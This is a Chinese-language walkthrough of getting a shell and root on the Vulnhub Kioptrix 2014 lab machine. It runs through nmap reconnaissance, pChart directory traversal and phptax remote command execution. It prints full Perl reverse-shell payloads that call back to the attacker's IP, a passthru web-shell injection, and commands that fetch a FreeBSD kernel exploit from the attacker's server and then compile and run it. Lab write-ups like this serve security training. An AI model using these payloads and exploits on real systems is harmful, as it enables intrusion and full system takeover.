Vulnhub-kioptix2014靶机getshell及提权
靶机搭建点击扫描虚拟机
https://track123.oss-cn-beijing.aliyuncs.com/20250218203956453.png
然后扫描文件夹即可
<img alt="" loading="lazy">
信息网络
扫描ip
nmap扫描得到目的靶机ip
nmap -sn 192.168.108.0/24https://track123.oss-cn-beijing.aliyuncs.com/20250218220737260.png
故
攻击机:192.168.108.130
目标靶机:192.168.108.140扫端口和服务信息
扫描开放端口信息
nmap -p 1-65535 192.168.108.140https://track123.oss-cn-beijing.aliyuncs.com/20250218221215936.png
可用信息
22/tcp closed ssh #ssh服务
80/tcp open http #Web网站
8080/tcp open http-proxy #HTTP代理或备用Web端口扫描服务信息
nmap -sV 192.168.108.140https://track123.oss-cn-beijing.aliyuncs.com/20250218221826387.png
可用信息
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)指纹探测
执行以下命令
nmap 192.168.108.140 -p 22,80,8080 -sV -sC -O --version-all https://track123.oss-cn-beijing.aliyuncs.com/20250218222555403.png
寻找攻击点并攻击
信息探测
访问8080端口,拒绝访问
https://track123.oss-cn-beijing.aliyuncs.com/20250219174720695.png
访问80端口,在源码处发现该提示
https://track123.oss-cn-beijing.aliyuncs.com/20250218223709099.png
访问该页面http://192.168.108.140/pChart2.1.3/examples/index.php
https://track123.oss-cn-beijing.aliyuncs.com/20250218223737174.png
根据提示应该与pChart2.1.3有关,查找该漏洞
https://track123.oss-cn-beijing.aliyuncs.com/20250219150016704.png
参考文章:https://vk9-sec.com/exploiting-pchart-2-1-3-directory-traversal-xss/
漏洞利用
两个可用信息,逐一访问试试
https://track123.oss-cn-beijing.aliyuncs.com/20250219165838830.png
可以正常访问
https://track123.oss-cn-beijing.aliyuncs.com/20250219165929622.png
再看看设置文件,Apache HTTP 服务器的主设置文件安装为 /usr/local/etc/apache2x/httpd.conf,其中 x 表示版本号,可以看到需要访问8080端口,且浏览器代理为Mozilla/4.0才可以
https://track123.oss-cn-beijing.aliyuncs.com/20250219170102533.png
访问8080端口,只有一个跳转链接,访问试试
https://track123.oss-cn-beijing.aliyuncs.com/20250219170207036.png
随便点击看看,没有什么有用信息
https://track123.oss-cn-beijing.aliyuncs.com/20250219170229779.png
根据phptax查找漏洞利用,发现一个利用脚本
https://github.com/NHPT/phptaxExploithttps://track123.oss-cn-beijing.aliyuncs.com/20250219170318999.png
在kali下载下来利用
https://track123.oss-cn-beijing.aliyuncs.com/20250219170407734.png
反弹shell
开启一个监听端口nc -lvvp 4444,成功反弹
python3 phptax_exp.py -u http://192.168.108.140:8080/phptax -e perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.108.130%22%3B%24p%3D4444%3Bsocket(S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname(%22tcp%22))%3Bif(connect(S%2Csockaddr_in(%24p%2Cinet_aton(%24i))))%7Bopen(STDIN%2C%22%3E%26S%22)%3Bopen(STDOUT%2C%22%3E%26S%22)%3Bopen(STDERR%2C%22%3E%26S%22)%3Bexec(%22%2Fbin%2Fsh%20-i%22)%3B%7D%3B%27
perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.108.130%22%3B%24p%3D4444%3Bsocket(S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname(%22tcp%22))%3Bif(connect(S%2Csockaddr_in(%24p%2Cinet_aton(%24i))))%7Bopen(STDIN%2C%22%3E%26S%22)%3Bopen(STDOUT%2C%22%3E%26S%22)%3Bopen(STDERR%2C%22%3E%26S%22)%3Bexec(%22%2Fbin%2Fsh%20-i%22)%3B%7D%3B%27https://track123.oss-cn-beijing.aliyuncs.com/20250219170513565.png
其他方法
方法1
本靶机还可以利用其它方法毗连,检察phptax漏洞,有两个远程命令执行漏洞
https://track123.oss-cn-beijing.aliyuncs.com/20250219170825747.png
下载下来检察
searchsploit -m 21665.txt
searchsploit -m 25849.txt先看25849.txt,有两处利用方式
https://track123.oss-cn-beijing.aliyuncs.com/20250219171149696.png
url/index.php?field=rce.php&newvalue=<?php passthru($_GET);?>
url/data/rce.php?cmd=id执行完成之后访问
https://track123.oss-cn-beijing.aliyuncs.com/20250219171349089.png
然后反弹shell
http://192.168.108.140:8080/phptax/data/rce.php?cmd=perl -e 'use Socket;$i="$ENV{192.168.108.130}";$p=$ENV{4444};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'kali监听即可
方法2
再看21665.txt,存在漏洞利用方式
https://track123.oss-cn-beijing.aliyuncs.com/20250219171047417.png
解码看看
https://track123.oss-cn-beijing.aliyuncs.com/20250219151635740.png
利用方式,同样kali监听即可
http://192.168.108.140:8080/phptax/drawimage.php?pfilez=xxx;perl -e 'use Socket;$i="$ENV{192.168.108.130}";$p=$ENV{4444};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';&pdf=make提权
检察靶机信息,该用户为www,且系统内核为FreeBSD 9.0
uname -a:输出有关系统的详细信息,包括内核版本、主机名、操作系统类型和架构等https://track123.oss-cn-beijing.aliyuncs.com/20250219170713934.png
检察历史漏洞
https://track123.oss-cn-beijing.aliyuncs.com/20250219172129615.png
该靶机没有wget命令
https://track123.oss-cn-beijing.aliyuncs.com/20250219172301814.png
网上查找下载方式
https://track123.oss-cn-beijing.aliyuncs.com/20250219172822839.png
下载exp脚本到本地
searchsploit FreeBSD 9.0 -m 26368.c
searchsploit FreeBSD 9.0 -m 28718.chttps://track123.oss-cn-beijing.aliyuncs.com/20250219173349167.png
开启web服务
python -m http.server 80下载exp
fetch http://192.168.108.130/26368.c
gcc 26368.c -o 26368
chmod 777 26368
./26368下载成功并编译
https://track123.oss-cn-beijing.aliyuncs.com/20250219174117981.png
添加权限并执行
https://track123.oss-cn-beijing.aliyuncs.com/20250219174223542.png
提权成功
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]